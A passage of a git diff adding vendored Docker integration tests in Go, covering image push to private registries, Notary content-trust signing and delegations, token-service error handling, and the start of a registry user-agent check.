*check.C) { + out, _, err := dockerCmdWithError("push", "busybox") + c.Assert(err, check.NotNil, check.Commentf("pushing an unprefixed repo didn't result in a non-zero exit status: %s", out)) +} + +func testPushUntagged(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + expected := "An image does not exist locally with the tag" + + out, _, err := dockerCmdWithError("push", repoName) + c.Assert(err, check.NotNil, check.Commentf("pushing the image to the private registry should have failed: output %q", out)) + c.Assert(out, checker.Contains, expected, check.Commentf("pushing the image failed")) +} + +func (s *DockerRegistrySuite) TestPushUntagged(c *check.C) { + testPushUntagged(c) +} + +func (s *DockerSchema1RegistrySuite) TestPushUntagged(c *check.C) { + testPushUntagged(c) +} + +func testPushBadTag(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/busybox:latest", privateRegistryURL) + expected := "does not exist" + + out, _, err := dockerCmdWithError("push", repoName) + c.Assert(err, check.NotNil, check.Commentf("pushing the image to the private registry should have failed: output %q", out)) + c.Assert(out, checker.Contains, expected, check.Commentf("pushing the image failed")) +} + +func (s *DockerRegistrySuite) TestPushBadTag(c *check.C) { + testPushBadTag(c) +} + +func (s *DockerSchema1RegistrySuite) TestPushBadTag(c *check.C) { + testPushBadTag(c) +} + +func testPushMultipleTags(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + repoTag1 := fmt.Sprintf("%v/dockercli/busybox:t1", privateRegistryURL) + repoTag2 := fmt.Sprintf("%v/dockercli/busybox:t2", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoTag1) + + dockerCmd(c, "tag", "busybox", repoTag2) + + dockerCmd(c, "push", repoName) + + // Ensure layer list is equivalent for repoTag1 and repoTag2 + out1, _ := dockerCmd(c, "pull", repoTag1) + + imageAlreadyExists := ": Image already exists" + var out1Lines []string + for _, outputLine := range strings.Split(out1, "\n") { + if strings.Contains(outputLine, imageAlreadyExists) { + out1Lines = append(out1Lines, outputLine) + } + } + + out2, _ := dockerCmd(c, "pull", repoTag2) + + var out2Lines []string + for _, outputLine := range strings.Split(out2, "\n") { + if strings.Contains(outputLine, imageAlreadyExists) { + out1Lines = append(out1Lines, outputLine) + } + } + c.Assert(out2Lines, checker.HasLen, len(out1Lines)) + + for i := range out1Lines { + c.Assert(out1Lines[i], checker.Equals, out2Lines[i]) + } +} + +func (s *DockerRegistrySuite) TestPushMultipleTags(c *check.C) { + testPushMultipleTags(c) +} + +func (s *DockerSchema1RegistrySuite) TestPushMultipleTags(c *check.C) { + testPushMultipleTags(c) +} + +func testPushEmptyLayer(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/emptylayer", privateRegistryURL) + emptyTarball, err := ioutil.TempFile("", "empty_tarball") + c.Assert(err, check.IsNil, check.Commentf("Unable to create test file")) + + tw := tar.NewWriter(emptyTarball) + err = tw.Close() + c.Assert(err, check.IsNil, check.Commentf("Error creating empty tarball")) + + freader, err := os.Open(emptyTarball.Name()) + c.Assert(err, check.IsNil, check.Commentf("Could not open test tarball")) + defer freader.Close() + + importCmd := exec.Command(dockerBinary, "import", "-", repoName) + importCmd.Stdin = freader + out, _, err := runCommandWithOutput(importCmd) + c.Assert(err, check.IsNil, check.Commentf("import failed: %q", out)) + + // Now verify we can push it + out, _, err = dockerCmdWithError("push", repoName) + c.Assert(err, check.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out)) +} + +func (s *DockerRegistrySuite) TestPushEmptyLayer(c *check.C) { + testPushEmptyLayer(c) +} + +func (s *DockerSchema1RegistrySuite) TestPushEmptyLayer(c *check.C) { + testPushEmptyLayer(c) +} + +// testConcurrentPush pushes multiple tags to the same repo +// concurrently. +func testConcurrentPush(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + + repos := []string{} + for _, tag := range []string{"push1", "push2", "push3"} { + repo := fmt.Sprintf("%v:%v", repoName, tag) + _, err := buildImage(repo, fmt.Sprintf(` + FROM busybox + ENTRYPOINT ["/bin/echo"] + ENV FOO foo + ENV BAR bar + CMD echo %s +`, repo), true) + c.Assert(err, checker.IsNil) + repos = append(repos, repo) + } + + // Push tags, in parallel + results := make(chan error) + + for _, repo := range repos { + go func(repo string) { + _, _, err := runCommandWithOutput(exec.Command(dockerBinary, "push", repo)) + results <- err + }(repo) + } + + for range repos { + err := <-results + c.Assert(err, checker.IsNil, check.Commentf("concurrent push failed with error: %v", err)) + } + + // Clear local images store. + args := append([]string{"rmi"}, repos...) + dockerCmd(c, args...) + + // Re-pull and run individual tags, to make sure pushes succeeded + for _, repo := range repos { + dockerCmd(c, "pull", repo) + dockerCmd(c, "inspect", repo) + out, _ := dockerCmd(c, "run", "--rm", repo) + c.Assert(strings.TrimSpace(out), checker.Equals, "/bin/sh -c echo "+repo) + } +} + +func (s *DockerRegistrySuite) TestConcurrentPush(c *check.C) { + testConcurrentPush(c) +} + +func (s *DockerSchema1RegistrySuite) TestConcurrentPush(c *check.C) { + testConcurrentPush(c) +} + +func (s *DockerRegistrySuite) TestCrossRepositoryLayerPush(c *check.C) { + sourceRepoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + // tag the image to upload it to the private registry + dockerCmd(c, "tag", "busybox", sourceRepoName) + // push the image to the registry + out1, _, err := dockerCmdWithError("push", sourceRepoName) + c.Assert(err, check.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out1)) + // ensure that none of the layers were mounted from another repository during push + c.Assert(strings.Contains(out1, "Mounted from"), check.Equals, false) + + digest1 := reference.DigestRegexp.FindString(out1) + c.Assert(len(digest1), checker.GreaterThan, 0, check.Commentf("no digest found for pushed manifest")) + + destRepoName := fmt.Sprintf("%v/dockercli/crossrepopush", privateRegistryURL) + // retag the image to upload the same layers to another repo in the same registry + dockerCmd(c, "tag", "busybox", destRepoName) + // push the image to the registry + out2, _, err := dockerCmdWithError("push", destRepoName) + c.Assert(err, check.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out2)) + // ensure that layers were mounted from the first repo during push + c.Assert(strings.Contains(out2, "Mounted from dockercli/busybox"), check.Equals, true) + + digest2 := reference.DigestRegexp.FindString(out2) + c.Assert(len(digest2), checker.GreaterThan, 0, check.Commentf("no digest found for pushed manifest")) + c.Assert(digest1, check.Equals, digest2) + + // ensure that pushing again produces the same digest + out3, _, err := dockerCmdWithError("push", destRepoName) + c.Assert(err, check.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out2)) + + digest3 := reference.DigestRegexp.FindString(out3) + c.Assert(len(digest2), checker.GreaterThan, 0, check.Commentf("no digest found for pushed manifest")) + c.Assert(digest3, check.Equals, digest2) + + // ensure that we can pull and run the cross-repo-pushed repository + dockerCmd(c, "rmi", destRepoName) + dockerCmd(c, "pull", destRepoName) + out4, _ := dockerCmd(c, "run", destRepoName, "echo", "-n", "hello world") + c.Assert(out4, check.Equals, "hello world") +} + +func (s *DockerSchema1RegistrySuite) TestCrossRepositoryLayerPushNotSupported(c *check.C) { + sourceRepoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + // tag the image to upload it to the private registry + dockerCmd(c, "tag", "busybox", sourceRepoName) + // push the image to the registry + out1, _, err := dockerCmdWithError("push", sourceRepoName) + c.Assert(err, check.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out1)) + // ensure that none of the layers were mounted from another repository during push + c.Assert(strings.Contains(out1, "Mounted from"), check.Equals, false) + + digest1 := reference.DigestRegexp.FindString(out1) + c.Assert(len(digest1), checker.GreaterThan, 0, check.Commentf("no digest found for pushed manifest")) + + destRepoName := fmt.Sprintf("%v/dockercli/crossrepopush", privateRegistryURL) + // retag the image to upload the same layers to another repo in the same registry + dockerCmd(c, "tag", "busybox", destRepoName) + // push the image to the registry + out2, _, err := dockerCmdWithError("push", destRepoName) + c.Assert(err, check.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out2)) + // schema1 registry should not support cross-repo layer mounts, so ensure that this does not happen + c.Assert(strings.Contains(out2, "Mounted from"), check.Equals, false) + + digest2 := reference.DigestRegexp.FindString(out2) + c.Assert(len(digest2), checker.GreaterThan, 0, check.Commentf("no digest found for pushed manifest")) + c.Assert(digest1, check.Not(check.Equals), digest2) + + // ensure that we can pull and run the second pushed repository + dockerCmd(c, "rmi", destRepoName) + dockerCmd(c, "pull", destRepoName) + out3, _ := dockerCmd(c, "run", destRepoName, "echo", "-n", "hello world") + c.Assert(out3, check.Equals, "hello world") +} + +func (s *DockerTrustSuite) TestTrustedPush(c *check.C) { + repoName := fmt.Sprintf("%v/dockerclitrusted/pushtest:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("Error running trusted push: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push")) + + // Try pull after push + pullCmd := exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out)) + + // Assert that we rotated the snapshot key to the server by checking our local keystore + contents, err := ioutil.ReadDir(filepath.Join(cliconfig.ConfigDir(), "trust/private/tuf_keys", privateRegistryURL, "dockerclitrusted/pushtest")) + c.Assert(err, check.IsNil, check.Commentf("Unable to read local tuf key files")) + // Check that we only have 1 key (targets key) + c.Assert(contents, checker.HasLen, 1) +} + +func (s *DockerTrustSuite) TestTrustedPushWithEnvPasswords(c *check.C) { + repoName := fmt.Sprintf("%v/dockerclienv/trusted:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmdWithPassphrases(pushCmd, "12345678", "12345678") + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("Error running trusted push: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push")) + + // Try pull after push + pullCmd := exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out)) +} + +func (s *DockerTrustSuite) TestTrustedPushWithFailingServer(c *check.C) { + repoName := fmt.Sprintf("%v/dockerclitrusted/failingserver:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + pushCmd := exec.Command(dockerBinary, "push", repoName) + // Using a name that doesn't resolve to an address makes this test faster + s.trustedCmdWithServer(pushCmd, "https://server.invalid:81/") + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.NotNil, check.Commentf("Missing error while running trusted push w/ no server")) + c.Assert(out, checker.Contains, "error contacting notary server", check.Commentf("Missing expected output on trusted push")) +} + +func (s *DockerTrustSuite) TestTrustedPushWithoutServerAndUntrusted(c *check.C) { + repoName := fmt.Sprintf("%v/dockerclitrusted/trustedandnot:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + pushCmd := exec.Command(dockerBinary, "push", "--disable-content-trust", repoName) + // Using a name that doesn't resolve to an address makes this test faster + s.trustedCmdWithServer(pushCmd, "https://server.invalid") + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("trusted push with no server and --disable-content-trust failed: %s\n%s", err, out)) + c.Assert(out, check.Not(checker.Contains), "Error establishing connection to notary repository", check.Commentf("Missing expected output on trusted push with --disable-content-trust:")) +} + +func (s *DockerTrustSuite) TestTrustedPushWithExistingTag(c *check.C) { + repoName := fmt.Sprintf("%v/dockerclitag/trusted:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + dockerCmd(c, "push", repoName) + + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) + + // Try pull after push + pullCmd := exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out)) +} + +func (s *DockerTrustSuite) TestTrustedPushWithExistingSignedTag(c *check.C) { + repoName := fmt.Sprintf("%v/dockerclipushpush/trusted:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + // Do a trusted push + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) + + // Do another trusted push + pushCmd = exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err = runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) + + dockerCmd(c, "rmi", repoName) + + // Try pull to ensure the double push did not break our ability to pull + pullCmd := exec.Command(dockerBinary, "pull", repoName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.IsNil, check.Commentf("Error running trusted pull: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Status: Downloaded", check.Commentf("Missing expected output on trusted pull with --disable-content-trust")) + +} + +func (s *DockerTrustSuite) TestTrustedPushWithIncorrectPassphraseForNonRoot(c *check.C) { + repoName := fmt.Sprintf("%v/dockercliincorretpwd/trusted:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + // Push with default passphrases + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push:\n%s", out)) + + // Push with wrong passphrases + pushCmd = exec.Command(dockerBinary, "push", repoName) + s.trustedCmdWithPassphrases(pushCmd, "12345678", "87654321") + out, _, err = runCommandWithOutput(pushCmd) + c.Assert(err, check.NotNil, check.Commentf("Error missing from trusted push with short targets passphrase: \n%s", out)) + c.Assert(out, checker.Contains, "could not find necessary signing keys", check.Commentf("Missing expected output on trusted push with short targets/snapsnot passphrase")) +} + +func (s *DockerTrustSuite) TestTrustedPushWithExpiredSnapshot(c *check.C) { + c.Skip("Currently changes system time, causing instability") + repoName := fmt.Sprintf("%v/dockercliexpiredsnapshot/trusted:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + // Push with default passphrases + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push")) + + // Snapshots last for three years. This should be expired + fourYearsLater := time.Now().Add(time.Hour * 24 * 365 * 4) + + runAtDifferentDate(fourYearsLater, func() { + // Push with wrong passphrases + pushCmd = exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err = runCommandWithOutput(pushCmd) + c.Assert(err, check.NotNil, check.Commentf("Error missing from trusted push with expired snapshot: \n%s", out)) + c.Assert(out, checker.Contains, "repository out-of-date", check.Commentf("Missing expected output on trusted push with expired snapshot")) + }) +} + +func (s *DockerTrustSuite) TestTrustedPushWithExpiredTimestamp(c *check.C) { + c.Skip("Currently changes system time, causing instability") + repoName := fmt.Sprintf("%v/dockercliexpiredtimestamppush/trusted:latest", privateRegistryURL) + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", repoName) + + // Push with default passphrases + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push")) + + // The timestamps expire in two weeks. Lets check three + threeWeeksLater := time.Now().Add(time.Hour * 24 * 21) + + // Should succeed because the server transparently re-signs one + runAtDifferentDate(threeWeeksLater, func() { + pushCmd := exec.Command(dockerBinary, "push", repoName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("Error running trusted push: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with expired timestamp")) + }) +} + +func (s *DockerTrustSuite) TestTrustedPushWithReleasesDelegationOnly(c *check.C) { + testRequires(c, NotaryHosting) + repoName := fmt.Sprintf("%v/dockerclireleasedelegationinitfirst/trusted", privateRegistryURL) + targetName := fmt.Sprintf("%s:latest", repoName) + s.notaryInitRepo(c, repoName) + s.notaryCreateDelegation(c, repoName, "targets/releases", s.not.keys[0].Public) + s.notaryPublish(c, repoName) + + s.notaryImportKey(c, repoName, "targets/releases", s.not.keys[0].Private) + + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", targetName) + + pushCmd := exec.Command(dockerBinary, "push", targetName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) + // check to make sure that the target has been added to targets/releases and not targets + s.assertTargetInRoles(c, repoName, "latest", "targets/releases") + s.assertTargetNotInRoles(c, repoName, "latest", "targets") + + // Try pull after push + os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust")) + + pullCmd := exec.Command(dockerBinary, "pull", targetName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) + c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out)) +} + +func (s *DockerTrustSuite) TestTrustedPushSignsAllFirstLevelRolesWeHaveKeysFor(c *check.C) { + testRequires(c, NotaryHosting) + repoName := fmt.Sprintf("%v/dockerclimanyroles/trusted", privateRegistryURL) + targetName := fmt.Sprintf("%s:latest", repoName) + s.notaryInitRepo(c, repoName) + s.notaryCreateDelegation(c, repoName, "targets/role1", s.not.keys[0].Public) + s.notaryCreateDelegation(c, repoName, "targets/role2", s.not.keys[1].Public) + s.notaryCreateDelegation(c, repoName, "targets/role3", s.not.keys[2].Public) + + // import everything except the third key + s.notaryImportKey(c, repoName, "targets/role1", s.not.keys[0].Private) + s.notaryImportKey(c, repoName, "targets/role2", s.not.keys[1].Private) + + s.notaryCreateDelegation(c, repoName, "targets/role1/subrole", s.not.keys[3].Public) + s.notaryImportKey(c, repoName, "targets/role1/subrole", s.not.keys[3].Private) + + s.notaryPublish(c, repoName) + + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", targetName) + + pushCmd := exec.Command(dockerBinary, "push", targetName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) + + // check to make sure that the target has been added to targets/role1 and targets/role2, and + // not targets (because there are delegations) or targets/role3 (due to missing key) or + // targets/role1/subrole (due to it being a second level delegation) + s.assertTargetInRoles(c, repoName, "latest", "targets/role1", "targets/role2") + s.assertTargetNotInRoles(c, repoName, "latest", "targets") + + // Try pull after push + os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust")) + + // pull should fail because none of these are the releases role + pullCmd := exec.Command(dockerBinary, "pull", targetName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.NotNil, check.Commentf(out)) +} + +func (s *DockerTrustSuite) TestTrustedPushSignsForRolesWithKeysAndValidPaths(c *check.C) { + repoName := fmt.Sprintf("%v/dockerclirolesbykeysandpaths/trusted", privateRegistryURL) + targetName := fmt.Sprintf("%s:latest", repoName) + s.notaryInitRepo(c, repoName) + s.notaryCreateDelegation(c, repoName, "targets/role1", s.not.keys[0].Public, "l", "z") + s.notaryCreateDelegation(c, repoName, "targets/role2", s.not.keys[1].Public, "x", "y") + s.notaryCreateDelegation(c, repoName, "targets/role3", s.not.keys[2].Public, "latest") + s.notaryCreateDelegation(c, repoName, "targets/role4", s.not.keys[3].Public, "latest") + + // import everything except the third key + s.notaryImportKey(c, repoName, "targets/role1", s.not.keys[0].Private) + s.notaryImportKey(c, repoName, "targets/role2", s.not.keys[1].Private) + s.notaryImportKey(c, repoName, "targets/role4", s.not.keys[3].Private) + + s.notaryPublish(c, repoName) + + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", targetName) + + pushCmd := exec.Command(dockerBinary, "push", targetName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out)) + c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag")) + + // check to make sure that the target has been added to targets/role1 and targets/role4, and + // not targets (because there are delegations) or targets/role2 (due to path restrictions) or + // targets/role3 (due to missing key) + s.assertTargetInRoles(c, repoName, "latest", "targets/role1", "targets/role4") + s.assertTargetNotInRoles(c, repoName, "latest", "targets") + + // Try pull after push + os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust")) + + // pull should fail because none of these are the releases role + pullCmd := exec.Command(dockerBinary, "pull", targetName) + s.trustedCmd(pullCmd) + out, _, err = runCommandWithOutput(pullCmd) + c.Assert(err, check.NotNil, check.Commentf(out)) +} + +func (s *DockerTrustSuite) TestTrustedPushDoesntSignTargetsIfDelegationsExist(c *check.C) { + testRequires(c, NotaryHosting) + repoName := fmt.Sprintf("%v/dockerclireleasedelegationnotsignable/trusted", privateRegistryURL) + targetName := fmt.Sprintf("%s:latest", repoName) + s.notaryInitRepo(c, repoName) + s.notaryCreateDelegation(c, repoName, "targets/role1", s.not.keys[0].Public) + s.notaryPublish(c, repoName) + + // do not import any delegations key + + // tag the image and upload it to the private registry + dockerCmd(c, "tag", "busybox", targetName) + + pushCmd := exec.Command(dockerBinary, "push", targetName) + s.trustedCmd(pushCmd) + out, _, err := runCommandWithOutput(pushCmd) + c.Assert(err, check.NotNil, check.Commentf("trusted push succeeded but should have failed:\n%s", out)) + c.Assert(out, checker.Contains, "no valid signing keys", + check.Commentf("Missing expected output on trusted push without keys")) + + s.assertTargetNotInRoles(c, repoName, "latest", "targets", "targets/role1") +} + +func (s *DockerRegistryAuthHtpasswdSuite) TestPushNoCredentialsNoRetry(c *check.C) { + repoName := fmt.Sprintf("%s/busybox", privateRegistryURL) + dockerCmd(c, "tag", "busybox", repoName) + out, _, err := dockerCmdWithError("push", repoName) + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, check.Not(checker.Contains), "Retrying") + c.Assert(out, checker.Contains, "no basic auth credentials") +} + +// This may be flaky but it's needed not to regress on unauthorized push, see #21054 +func (s *DockerSuite) TestPushToCentralRegistryUnauthorized(c *check.C) { + testRequires(c, Network) + repoName := "test/busybox" + dockerCmd(c, "tag", "busybox", repoName) + out, _, err := dockerCmdWithError("push", repoName) + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, check.Not(checker.Contains), "Retrying") +} + +func getTestTokenService(status int, body string, retries int) *httptest.Server { + var mu sync.Mutex + return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + mu.Lock() + if retries > 0 { + w.WriteHeader(http.StatusServiceUnavailable) + w.Header().Set("Content-Type", "application/json") + w.Write([]byte(`{"errors":[{"code":"UNAVAILABLE","message":"cannot create token at this time"}]}`)) + retries-- + } else { + w.WriteHeader(status) + w.Header().Set("Content-Type", "application/json") + w.Write([]byte(body)) + } + mu.Unlock() + })) +} + +func (s *DockerRegistryAuthTokenSuite) TestPushTokenServiceUnauthResponse(c *check.C) { + ts := getTestTokenService(http.StatusUnauthorized, `{"errors": [{"Code":"UNAUTHORIZED", "message": "a message", "detail": null}]}`, 0) + defer ts.Close() + s.setupRegistryWithTokenService(c, ts.URL) + repoName := fmt.Sprintf("%s/busybox", privateRegistryURL) + dockerCmd(c, "tag", "busybox", repoName) + out, _, err := dockerCmdWithError("push", repoName) + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Not(checker.Contains), "Retrying") + c.Assert(out, checker.Contains, "unauthorized: a message") +} + +func (s *DockerRegistryAuthTokenSuite) TestPushMisconfiguredTokenServiceResponseUnauthorized(c *check.C) { + ts := getTestTokenService(http.StatusUnauthorized, `{"error": "unauthorized"}`, 0) + defer ts.Close() + s.setupRegistryWithTokenService(c, ts.URL) + repoName := fmt.Sprintf("%s/busybox", privateRegistryURL) + dockerCmd(c, "tag", "busybox", repoName) + out, _, err := dockerCmdWithError("push", repoName) + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Not(checker.Contains), "Retrying") + split := strings.Split(out, "\n") + c.Assert(split[len(split)-2], check.Equals, "unauthorized: authentication required") +} + +func (s *DockerRegistryAuthTokenSuite) TestPushMisconfiguredTokenServiceResponseError(c *check.C) { + ts := getTestTokenService(http.StatusTooManyRequests, `{"errors": [{"code":"TOOMANYREQUESTS","message":"out of tokens"}]}`, 4) + defer ts.Close() + s.setupRegistryWithTokenService(c, ts.URL) + repoName := fmt.Sprintf("%s/busybox", privateRegistryURL) + dockerCmd(c, "tag", "busybox", repoName) + out, _, err := dockerCmdWithError("push", repoName) + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "Retrying") + c.Assert(out, checker.Not(checker.Contains), "Retrying in 15") + split := strings.Split(out, "\n") + c.Assert(split[len(split)-2], check.Equals, "toomanyrequests: out of tokens") +} + +func (s *DockerRegistryAuthTokenSuite) TestPushMisconfiguredTokenServiceResponseUnparsable(c *check.C) { + ts := getTestTokenService(http.StatusForbidden, `no way`, 0) + defer ts.Close() + s.setupRegistryWithTokenService(c, ts.URL) + repoName := fmt.Sprintf("%s/busybox", privateRegistryURL) + dockerCmd(c, "tag", "busybox", repoName) + out, _, err := dockerCmdWithError("push", repoName) + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Not(checker.Contains), "Retrying") + split := strings.Split(out, "\n") + c.Assert(split[len(split)-2], checker.Contains, "error parsing HTTP 403 response body: ") +} + +func (s *DockerRegistryAuthTokenSuite) TestPushMisconfiguredTokenServiceResponseNoToken(c *check.C) { + ts := getTestTokenService(http.StatusOK, `{"something": "wrong"}`, 0) + defer ts.Close() + s.setupRegistryWithTokenService(c, ts.URL) + repoName := fmt.Sprintf("%s/busybox", privateRegistryURL) + dockerCmd(c, "tag", "busybox", repoName) + out, _, err := dockerCmdWithError("push", repoName) + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Not(checker.Contains), "Retrying") + split := strings.Split(out, "\n") + c.Assert(split[len(split)-2], check.Equals, "authorization server did not include a token in the response") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go new file mode 100644 index 0000000000..fb9a66a541 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_registry_user_agent_test.go @@ -0,0 +1,120 @@ +package main + +import ( + "fmt" + "net/http" + "regexp" + + "github.com/go-check/check" +) + +// unescapeBackslashSemicolonParens unescapes \;() +func unescapeBackslashSemicolonParens(s string) string { + re := regexp.MustCompile(`\\;`) + ret := re.ReplaceAll([]byte(s), []byte(";")) + + re = regexp.MustCompile(`\\\(`) + ret = re.ReplaceAll([]byte(ret), []byte("(")) + + re = regexp.MustCompile(`\\\)`) + ret = re.ReplaceAll([]byte(ret), []byte(")")) + + re = regexp.MustCompile(`\\\\`) + ret = re.ReplaceAll([]byte(ret), []byte(`\`)) + + return string(ret) +} + +func regexpCheckUA(c *check.C, ua string) { + re := regexp.MustCompile("(?P.+) UpstreamClient(?P.+)") + substrArr := re.FindStringSubmatch(ua) + + c.Assert(substrArr, check.HasLen, 3, check.Commentf("Expected 'UpstreamClient()' with upstream client UA")) + dockerUA := substrArr[1] + upstreamUAEscaped := substrArr[2] + + // check dockerUA looks correct + reDockerUA := regexp.MustCompile("^docker/[0-9A-Za-z+]") + bMatchDockerUA := reDockerUA.MatchString(dockerUA) + c.Assert(bMatchDockerUA, check.Equals, true, check.Commentf("Docker Engine User-Agent malformed")) + + // check upstreamUA looks correct + // Expecting something like: Docker-Client/1.11.0-dev (linux) + upstreamUA := unescapeBackslashSemicolonParens(upstreamUAEscaped) + reUpstreamUA := 